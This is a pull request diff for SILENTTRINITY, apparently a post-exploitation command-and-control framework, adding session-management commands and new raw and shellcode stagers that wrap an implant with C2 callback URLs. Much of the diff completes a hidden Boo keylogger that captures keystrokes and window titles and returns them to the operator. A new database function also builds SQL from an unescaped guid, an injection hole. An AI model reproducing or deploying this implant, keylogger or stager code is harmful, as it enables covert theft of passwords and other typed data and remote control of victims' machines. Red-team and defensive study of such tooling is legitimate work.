### PR TITLE
New Features and Bug Fixes

### DIFF
--- a/silenttrinity/core/client/cmdloop.py
+++ b/silenttrinity/core/client/cmdloop.py
@@ -160,6 +160,21 @@ class STShell:
             return list(filter(lambda c: c.name == ctx_name, cli_menus))[0]
         return cli_menus
 
+    def patch_badchar(self, args, flag=None):
+        if flag:
+            for key, value in args.items():
+                if key == '<value>':
+                    args[key] = "-" + value
+                    return args
+        else:
+            try:
+                if (args[2][0] == '-'):
+                    args[2] = args[2][1:]
+                    return True, args
+                return False, args
+            except IndexError:
+                return False, args
+
     async def update_prompt(self, ctx):
         self.prompt_session.message = HTML(
             ("[<ansiyellow>"
@@ -191,11 +206,13 @@ class STShell:
             try:
                 command = shlex.split(text)
                 logging.debug(f"command: {command[0]} args: {command[1:]} ctx: {self.current_context.name}")
-
+                patch_badchar, command = self.patch_badchar(command)
                 args = docopt(
                     getattr(self.current_context if hasattr(self.current_context, command[0]) else self, command[0]).__doc__,
                     argv=command[1:]
                 )
+                if patch_badchar:
+                    args = self.patch_badchar(args, patch_badchar)
             except ValueError as e:
                 print_bad(f"Error parsing command: {e}")
             except AttributeError as e:
@@ -214,7 +231,7 @@ class STShell:
                 elif self.current_context._remote is True:
                     response = await self.teamservers.send(
                             ctx=self.current_context.name,
-                            cmd=command[0], 
+                            cmd=command[0],
                             args=args
                         )
 
@@ -252,7 +269,7 @@ class STShell:
                 # We sleep for one second to allow for the connection to complete
                 # As of writing there isn't a way to wait until the initial connection is successfull
                 #e.g. await self.teamservers.selected.connected
-                await asyncio.sleep(1) 
+                await asyncio.sleep(1)
                 await self.run_resource_file(self.args['--resource-file'])
 
         while True:

--- a/silenttrinity/core/client/contexts/sessions.py
+++ b/silenttrinity/core/client/contexts/sessions.py
@@ -140,13 +140,14 @@ class Sessions:
     @command
     def unregister(self, guid: str, response):
         """
-        Unregister a session with the server
+        Unregister a session with the server. You will need to register the session manually to reuse it again.
 
         Usage: unregister [-h] [<guid>]
         """
         try:
             if (response.result['guid']):
                 print_good(f"Unregistered session (guid: {response.result['guid']})")
+                print_good(f"If you wish to reuse the session you must manually register it.")
         except KeyError:
             print_bad(f"{response.result['message']}")
 

--- a/silenttrinity/core/client/contexts/sessions.py
+++ b/silenttrinity/core/client/contexts/sessions.py
@@ -1,8 +1,9 @@
 import asyncio
 import logging
-from silenttrinity.core.utils import print_good, print_info
+from silenttrinity.core.utils import print_good, print_info, print_bad
 from silenttrinity.core.client.utils import command, register_cli_commands
 from terminaltables import SingleTable
+from termcolor import colored
 from time import gmtime, strftime
 
 @register_cli_commands
@@ -46,11 +47,16 @@ class Sessions:
                 except KeyError:
                     username = 'N/A'
 
+                if (gmtime(session['lastcheckin'])[5] > int(session['info']['Sleep']/1000)):
+                    timestamp = colored(strftime("%Hh %Mm %Ss", gmtime(session['lastcheckin'])), "red", attrs=['bold'])
+                else:
+                    timestamp = colored(strftime("%Hh %Mm %Ss", gmtime(session['lastcheckin'])), "green", attrs=['bold'])
+
                 table_data.append([
                     guid,
                     username,
                     session['address'],
-                    strftime("h %H m %M s %S", gmtime(session['lastcheckin']))
+                    timestamp
                 ])
 
         table = SingleTable(table_data, title="Sessions")
@@ -130,3 +136,36 @@ class Sessions:
         Usage: rename [-h] <guid> <name>
         """
         pass
+
+    @command
+    def unregister(self, guid: str, response):
+        """
+        Unregister a session with the server
+
+        Usage: unregister [-h] [<guid>]
+        """
+        try:
+            if (response.result['guid']):
+                print_good(f"Unregistered session (guid: {response.result['guid']})")
+        except KeyError:
+            print_bad(f"{response.result['message']}")
+
+    @command
+    def getpsk(self, guid: str, response):
+        """
+        Get psk of a session via guid
+
+        Usage: getpsk [-h] [<guid>]
+        """
+
+        print_good(f"psk: {response.result['psk']}")
+
+    @command
+    def purge(self, response):
+        """
+        Purge expired sessions (remove sessions that haven't checked in)
+
+        Usage: purge [-h]
+        """
+
+        print_good(f"Purged {response.result} sessions.")

--- a/silenttrinity/core/teamserver/contexts/sessions.py
+++ b/silenttrinity/core/teamserver/contexts/sessions.py
@@ -248,10 +248,9 @@ class Sessions:
         with STDatabase() as db:
             psk = db.get_session_psk(guid)
         session = Session(guid, psk)
-        self.sessions.add(session)
 
         if (session in self.sessions):
-            return {"message": "You can't kill an active session. Kill and purge first."}
+            return {"message": "You can't unregister an active session. Kill then purge the session first."}
         with STDatabase() as db:
             db.remove_session(guid)
         logging.info(f"Unregistering session: {guid}")

--- a/silenttrinity/core/teamserver/contexts/sessions.py
+++ b/silenttrinity/core/teamserver/contexts/sessions.py
@@ -196,7 +196,7 @@ class Sessions:
         )
 
     def list(self):
-        return {s.guid: dict(s) for s in self.sessions if s.info}
+        return {s.name: dict(s) for s in self.sessions if s.info}
 
     def info(self, guid):
         try:
@@ -239,7 +239,7 @@ class Sessions:
     def rename(self, guid, name):
         try:
             session = self.get_session(guid)
-            session.guid = name
+            session.name = name
         except SessionNotFoundError:
             raise CmdError(f"No session with guid: {guid}")
 

--- a/silenttrinity/core/teamserver/db.py
+++ b/silenttrinity/core/teamserver/db.py
@@ -66,6 +66,14 @@ class STDatabase:
             except sqlite3.IntegrityError:
                 logging.debug(f"Session with guid {guid} already present in database")
 
+    def remove_session(self, guid):
+        with self.db:
+            try:
+                self.db.execute(f"DELETE FROM sessions WHERE guid = '{guid}'")
+                return
+            except sqlite3.IntegrityError:
+                logging.debug(f"Could not remove {guid} from the database")
+
     def get_session_psk(self, guid):
         with self.db:
             query = self.db.execute("SELECT psk FROM sessions WHERE guid=(?)", [str(guid)])

--- a/silenttrinity/core/teamserver/modules/boo/getdrives.py
+++ b/silenttrinity/core/teamserver/modules/boo/getdrives.py
@@ -1,0 +1,17 @@
+from silenttrinity.core.teamserver.module import Module
+from silenttrinity.core.utils import get_path_in_package
+
+
+class STModule(Module):
+    def __init__(self):
+        self.name = 'boo/getdrives'
+        self.language = 'boo'
+        self.description = 'Gets a list of drives on the system'
+        self.author = '@glid3s'
+        self.references = []
+        self.options = {}
+
+    def payload(self):
+        with open(get_path_in_package('core/teamserver/modules/boo/src/getdrives.boo'), 'r') as module_src:
+            src = module_src.read()
+            return src

--- a/silenttrinity/core/teamserver/modules/boo/src/getdrives.boo
+++ b/silenttrinity/core/teamserver/modules/boo/src/getdrives.boo
@@ -1,0 +1,14 @@
+import System
+import System.IO
+
+public static def Main():
+    allDrives as (DriveInfo) = DriveInfo.GetDrives()
+    for d as DriveInfo in allDrives:
+        print d.Name
+        print '  Type: ' + d.DriveType
+        if d.IsReady == true:
+            print '  Volume label: '+ d.VolumeLabel
+            print '  File system: '+ d.DriveFormat
+            print '  Total available space:    '+ d.AvailableFreeSpace +' bytes'
+            print '  Total free space:         '+ d.TotalFreeSpace +' bytes'
+            print '  Total size of drive:      '+ d.TotalSize +' bytes'

--- a/silenttrinity/core/teamserver/modules/boo/src/keylogger.boo
+++ b/silenttrinity/core/teamserver/modules/boo/src/keylogger.boo
@@ -12,7 +12,6 @@ import System.Threading
 import System.Windows.Input
 
 
-
 public class InterceptKeys(Form):
     private static _job as duck
     private static final WH_KEYBOARD_LL = 13
@@ -27,19 +26,17 @@ public class InterceptKeys(Form):
         _job = job
         Main()
 
-    
     public static def returnCapture():
         _job.SendJobResults(results);
 
     public static def Main():
-        
+
         handle  = GetConsoleWindow()
-        
+
         // Hide
         ShowWindow(handle, SW_HIDE)
-        
-        
-        
+
+
         STAThread as Thread = Thread() do:
             Thread.CurrentThread.IsBackground = true
             Thread.Sleep((TimeSpan.FromMinutes(MINUTES).TotalMilliseconds cast int))
@@ -47,22 +44,19 @@ public class InterceptKeys(Form):
 
         STAThread.SetApartmentState(ApartmentState.STA)
         STAThread.Start()
-        
+
         _hookID = SetHook(_proc)
         Application.Run()
         UnhookWindowsHookEx(_hookID)
-        
-        
 
-    
+
     private static def SetHook(proc as LowLevelKeyboardProc) as IntPtr:
         using curProcess = Process.GetCurrentProcess():
             using curModule = curProcess.MainModule:
                 return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0)
 
-    
     private callable LowLevelKeyboardProc(nCode as int, wParam as IntPtr, lParam as IntPtr) as IntPtr
-    
+
     private static def HookCallback(nCode as int, wParam as IntPtr, lParam as IntPtr) as IntPtr:
 
         window = GetActiveWindowTitle()
@@ -99,56 +93,56 @@ public class InterceptKeys(Form):
                 results += '[Right WinKey]'
             elif theKeyPressed == Keys.PrintScreen:
                 results += '[PrtScrn]'
-            // elif theKeyPressed == Keys.D0:
-            //     if isShift():
-            //         results += ')'
-            //     else:
-            //         results += '0'
-            // elif theKeyPressed == Keys.D1:
-            //     if isShift():
-            //         results += '!'
-            //     else:
-            //         results += '1'
-            // elif theKeyPressed == Keys.D2:
-            //     if isShift():
-            //         results += '@'
-            //     else:
-            //         results += '2'
-            // elif theKeyPressed == Keys.D3:
-            //     if isShift():
-            //         results += '#'
-            //     else:
-            //         results += '3'
-            // elif theKeyPressed == Keys.D4:
-            //     if isShift():
-            //         results += '$'
-            //     else:
-            //         results += '4'
-            // elif theKeyPressed == Keys.D5:
-            //     if isShift():
-            //         results += '%'
-            //     else:
-            //         results += '5'
-            // elif theKeyPressed == Keys.D6:
-            //     if isShift():
-            //         results += '^'
-            //     else:
-            //         results += '6'
-            // elif theKeyPressed == Keys.D7:
-            //     if isShift():
-            //         results += '&'
-            //     else:
-            //         results += '7'
-            // elif theKeyPressed == Keys.D8:
-            //     if isShift():
-            //         results += '*'
-            //     else:
-            //         results += '8'
-            // elif theKeyPressed == Keys.D9:
-            //     if isShift():
-            //         results += '('
-            //     else:
-            //         results += '9'
+            elif theKeyPressed == Keys.D0:
+                if isShift():
+                    results += ')'
+                else:
+                    results += '0'
+            elif theKeyPressed == Keys.D1:
+                if isShift():
+                    results += '!'
+                else:
+                    results += '1'
+            elif theKeyPressed == Keys.D2:
+                if isShift():
+                    results += '@'
+                else:
+                    results += '2'
+            elif theKeyPressed == Keys.D3:
+                if isShift():
+                    results += '#'
+                else:
+                    results += '3'
+            elif theKeyPressed == Keys.D4:
+                if isShift():
+                    results += '$'
+                else:
+                    results += '4'
+            elif theKeyPressed == Keys.D5:
+                if isShift():
+                    results += '%'
+                else:
+                    results += '5'
+            elif theKeyPressed == Keys.D6:
+                if isShift():
+                    results += '^'
+                else:
+                    results += '6'
+            elif theKeyPressed == Keys.D7:
+                if isShift():
+                    results += '&'
+                else:
+                    results += '7'
+            elif theKeyPressed == Keys.D8:
+                if isShift():
+                    results += '*'
+                else:
+                    results += '8'
+            elif theKeyPressed == Keys.D9:
+                if isShift():
+                    results += '('
+                else:
+                    results += '9'
             elif theKeyPressed == Keys.Space:
                 results += ' '
             elif theKeyPressed == Keys.NumLock:
@@ -165,69 +159,69 @@ public class InterceptKeys(Form):
                 results += '[Delete]'
             elif theKeyPressed == Keys.Enter:
                 results += '[Enter]'
-            // elif theKeyPressed == Keys.OemSemicolon:
-            //     if isShift():
-            //         results += ':'
-            //     else:
-            //         results += ';'
-            // elif theKeyPressed == Keys.Oemtilde:
-            //     if isShift():
-            //         results += '~'
-            //     else:
-            //         results += '`'
-            // elif theKeyPressed == Keys.Oemplus:
-            //     if isShift():
-            //         results += '+'
-            //     else:
-            //         results += '='
-            // elif theKeyPressed == Keys.OemMinus:
-            //     if isShift():
-            //         results += '_'
-            //     else:
-            //         results += '-'
-            // elif theKeyPressed == Keys.Oemcomma:
-            //     if isShift():
-            //         results += '<'
-            //     else:
-            //         results += ','
-            // elif theKeyPressed == Keys.OemPeriod:
-            //     if isShift():
-            //         results += '>'
-            //     else:
-            //         results += '.'
-            // elif theKeyPressed == Keys.OemQuestion:
-            //     if isShift():
-            //         results += '?'
-            //     else:
-            //         results += '/'
-            // elif theKeyPressed == Keys.OemPipe:
-            //     if isShift():
-            //         results += '|'
-            //     else:
-            //         results += '\\'
-            // elif theKeyPressed == Keys.OemQuotes:
-            //     if isShift():
-            //         results += '"'
-            //     else:
-            //         results += "'"
-            // elif theKeyPressed == Keys.OemCloseBrackets:
-            //     if isShift():
-            //         results += ']'
-            //     else:
-            //         results += '}'
-            // elif theKeyPressed == Keys.OemOpenBrackets:
-            //     if isShift():
-            //         results += '['
-            //     else:
-            //         results += '{'
+            elif theKeyPressed == Keys.OemSemicolon:
+                if isShift():
+                    results += ':'
+                else:
+                    results += ';'
+            elif theKeyPressed == Keys.Oemtilde:
+                if isShift():
+                    results += '~'
+                else:
+                    results += '`'
+            elif theKeyPressed == Keys.Oemplus:
+                if isShift():
+                    results += '+'
+                else:
+                    results += '='
+            elif theKeyPressed == Keys.OemMinus:
+                if isShift():
+                    results += '_'
+                else:
+                    results += '-'
+            elif theKeyPressed == Keys.Oemcomma:
+                if isShift():
+                    results += '<'
+                else:
+                    results += ','
+            elif theKeyPressed == Keys.OemPeriod:
+                if isShift():
+                    results += '>'
+                else:
+                    results += '.'
+            elif theKeyPressed == Keys.OemQuestion:
+                if isShift():
+                    results += '?'
+                else:
+                    results += '/'
+            elif theKeyPressed == Keys.OemPipe:
+                if isShift():
+                    results += '|'
+                else:
+                    results += '\\'
+            elif theKeyPressed == Keys.OemQuotes:
+                if isShift():
+                    results += '"'
+                else:
+                    results += "'"
+            elif theKeyPressed == Keys.OemCloseBrackets:
+                if isShift():
+                    results += ']'
+                else:
+                    results += '}'
+            elif theKeyPressed == Keys.OemOpenBrackets:
+                if isShift():
+                    results += '['
+                else:
+                    results += '{'
             elif theKeyPressed == Keys.Back:
                 results += '[Backspace]'
             elif theKeyPressed == Keys.PrintScreen:
                 results += '[PrintScreen]'
             elif theKeyPressed == Keys.End:
-                results += '[End]' 
+                results += '[End]'
             elif theKeyPressed == Keys.Insert:
-                results += '[Insert]' 
+                results += '[Insert]'
             elif theKeyPressed == Keys.Home:
                 results += '[Home]'
             elif theKeyPressed == Keys.PageUp:
@@ -259,77 +253,72 @@ public class InterceptKeys(Form):
             elif theKeyPressed.ToString().Contains('D') and theKeyPressed.ToString().Length >1:
                 results += '[' + theKeyPressed + ']'
             else:
-                // t = (vkCode cast Keys)
-                // isCapslock  = Keyboard.IsKeyToggled(Key.CapsLock)
-                // if isCapslock and isShift():
-                //     results += t.ToString().ToLower()
-                // elif isCapslock and (not isShift()):
-                //     results += t.ToString()
-                // elif (not isCapslock) and isShift():
-                //     results += t.ToString()
-                // else:
-                //     results += t.ToString().ToLower()
-                results += theKeyPressed
-            
+                t = (vkCode cast Keys)
+                isCapslock  = Control.IsKeyLocked(Keys.CapsLock)
+                if isCapslock and isShift():
+                    results += t.ToString().ToLower()
+                elif isCapslock and (not isShift()):
+                    results += t.ToString()
+                elif (not isCapslock) and isShift():
+                    results += t.ToString()
+                else:
+                    results += t.ToString().ToLower()
+                //results += theKeyPressed
+
         return CallNextHookEx(_hookID, nCode, wParam, lParam)
-    
-    
+
+
     private static def GetActiveWindowTitle() as string:
         nChars = 256
         Buff = StringBuilder(nChars)
         handle as IntPtr = GetForegroundWindow()
-        
+
         if GetWindowText(handle, Buff, nChars) > 0:
             return Buff.ToString()
         return ''
 
     private static def isShift() as bool:
-        // if Keyboard.IsKeyDown(Key.LeftShift) or Keyboard.IsKeyDown(Key.RightShift):
-        //     return true
-        // else:
+
+        if Control.ModifierKeys == Keys.Shift:
+            return true
+        else:
             return false
-    
+
     [DllImport('user32.dll', CharSet: CharSet.Auto, SetLastError: true)]
     private static def SetWindowsHookEx(idHook as int, lpfn as LowLevelKeyboardProc, hMod as IntPtr, dwThreadId as uint) as IntPtr:
         pass
 
-    
     [DllImport('user32.dll', CharSet: CharSet.Auto, SetLastError: true)]
     private static def UnhookWindowsHookEx(hhk as IntPtr) as bool:
         pass
 
-    
     [DllImport('user32.dll', CharSet: CharSet.Auto, SetLastError: true)]
     private static def CallNextHookEx(hhk as IntPtr, nCode as int, wParam as IntPtr, lParam as IntPtr) as IntPtr:
         pass
 
-    
+
     [DllImport('kernel32.dll', CharSet: CharSet.Auto, SetLastError: true)]
     private static def GetModuleHandle(lpModuleName as string) as IntPtr:
         pass
 
-    
     [DllImport('kernel32.dll')]
     private static def GetConsoleWindow() as IntPtr:
         pass
 
-    
     [DllImport('user32.dll')]
     private static def ShowWindow(hWnd as IntPtr, nCmdShow as int) as bool:
         pass
-
 
     [DllImport('user32.dll')]
     private static def GetForegroundWindow() as IntPtr:
         pass
 
-    
     [DllImport('user32.dll')]
     private static def GetWindowText(hWnd as IntPtr, text as StringBuilder, count as int) as int:
         pass
 
 
     private static final SW_HIDE = 0
-    
+
 public static def Start(job as duck):
     Application.Run(InterceptKeys(job))

--- a/silenttrinity/core/teamserver/session.py
+++ b/silenttrinity/core/teamserver/session.py
@@ -42,12 +42,20 @@ class Session:
 
     @property
     def guid(self):
-        if self._alias is not None:
-            return self._alias
         return self._guid
 
     @guid.setter
     def guid(self, value):
+        self._guid = value
+
+    @property
+    def name(self):
+        if self._alias is not None:
+            return self._alias
+        return self._guid
+
+    @name.setter
+    def name(self, value):
         self._alias = value
 
     @property

--- a/silenttrinity/core/teamserver/stagers/raw.py
+++ b/silenttrinity/core/teamserver/stagers/raw.py
@@ -1,0 +1,44 @@
+import uuid
+import donut
+
+from silenttrinity.core.teamserver.crypto import gen_stager_psk
+from silenttrinity.core.teamserver.stager import Stager
+from silenttrinity.core.utils import get_path_in_package
+
+
+class STStager(Stager):
+    def __init__(self):
+        self.name = 'raw'
+        self.description = 'Generate a raw binary file to use how you see fit'
+        self.suggestions = ''
+        self.extension = 'bin'
+        self.author = '@glides'
+        self.options = {
+            'Architecture': {
+                'Description'   :   'Architecture(x64, x86, x64+x86). [Warning: getting this wrong will crash things]',
+                'Required'      :   False,
+                'Value'         :   'x64+x86'
+            }
+        }
+
+    def generate(self, listener):
+        guid = uuid.uuid4()
+        psk = gen_stager_psk()
+
+        c2_urls = ','.join(
+            filter(None,
+                   [f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls']])
+        )
+
+        arch = 3
+
+        # User can specify 64-bit or 32-bit
+        if self.options['Architecture']['Value'] == 'x64':
+            arch = 2
+        elif self.options['Architecture']['Value'] == 'x86':
+            arch = 1
+
+        donut_shellcode = donut.create(file=get_path_in_package('core/teamserver/data/naga.exe'),
+                                       params=f"{guid};{psk};{c2_urls}", arch=arch)
+
+        return guid, psk, donut_shellcode.decode("latin-1")

--- a/silenttrinity/core/teamserver/stagers/shellcode.py
+++ b/silenttrinity/core/teamserver/stagers/shellcode.py
@@ -1,0 +1,47 @@
+import uuid
+import donut
+
+from silenttrinity.core.teamserver.crypto import gen_stager_psk
+from silenttrinity.core.teamserver.stager import Stager
+from silenttrinity.core.utils import get_path_in_package, shellcode_to_hex_string
+
+
+class STStager(Stager):
+    def __init__(self):
+        self.name = 'shellcode'
+        self.description = 'Generate a shellcode payload'
+        self.suggestions = ''
+        self.extension = 'txt'
+        self.author = '@glides'
+        self.options = {
+            'Architecture': {
+                'Description': 'Architecture (x64, x86, x64+x86). [Warning: getting this wrong will crash things]',
+                'Required': False,
+                'Value': 'x64+x86'
+            }
+        }
+
+    def generate(self, listener):
+        with open(get_path_in_package('core/teamserver/data/naga.exe'), 'rb') as assembly:
+            guid = uuid.uuid4()
+            psk = gen_stager_psk()
+
+            c2_urls = ','.join(
+                filter(None,
+                       [f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls']])
+            )
+
+            arch = 3
+
+            # User can specify 64-bit or 32-bit
+            if self.options['Architecture']['Value'] == 'x64':
+                arch = 2
+            elif self.options['Architecture']['Value'] == 'x86':
+                arch = 1
+
+            donut_shellcode = donut.create(file=get_path_in_package('core/teamserver/data/naga.exe'),
+                                           params=f"{guid};{psk};{c2_urls}", arch=arch)
+
+            shellcode = shellcode_to_hex_string(donut_shellcode)
+
+            return guid, psk, shellcode

--- a/silenttrinity/core/utils.py
+++ b/silenttrinity/core/utils.py
@@ -42,6 +42,15 @@ def shellcode_to_hex_byte_array(shellcode):
 
     return ','.join(byte_array)
 
+def shellcode_to_hex_string(shellcode):
+    byte_array = []
+    shellcode_hex = shellcode.hex()
+    for i in range(0, len(shellcode_hex), 2):
+        byte = shellcode_hex[i:i + 2]
+        byte_array.append(f"\\x{byte.upper()}")
+
+    return ''.join(byte_array)
+
 # Stolen and adapted from https://github.com/zerosum0x0/koadic/blob/master/core/plugin.py
 def convert_shellcode(shellcode):
     shellcode = shellcode.translate({ord(c): None for c in '\\x'}).rstrip('\n')


### PR DESCRIPTION
### New Features:

**Session Management** (Enhance #45 )

- **Commands**
    * _**getpsk**_ guid
         Retrieve the psk for a given session
    * _**unregister**_ guid
         Unregister a session from the database
    * _**purge**_
         Purge all sessions that haven't checked-in within their set interval from the list view
- **Misc**    
    * **Expired session visual indicator**
         Highlights the checked-in timestamp green active, or red for expired

**Stager Payload Options** (Implement #132 ) 

- **raw**
Output the stager payload to a raw bin file
- **shellcode**
Output the stager payload to shellcode (in hex)


### Bug Fixes:

**Fix for #109**

- This bug is caused because docopt treats the '-' like an option and swallows it when parsing the line. There may be a better fix for this but the patch currently just detects if the '-' is the first char in the string. If so, it strips it from the string and sets a flag. Then the command is parsed and the '-' is added back in to the value after detecting if the flag is set.

**Fix for #135**

- The guid property was always being overwritten with the alias property after being renamed. A new property 'name' has been made to better make use of the guid and alias of a session. 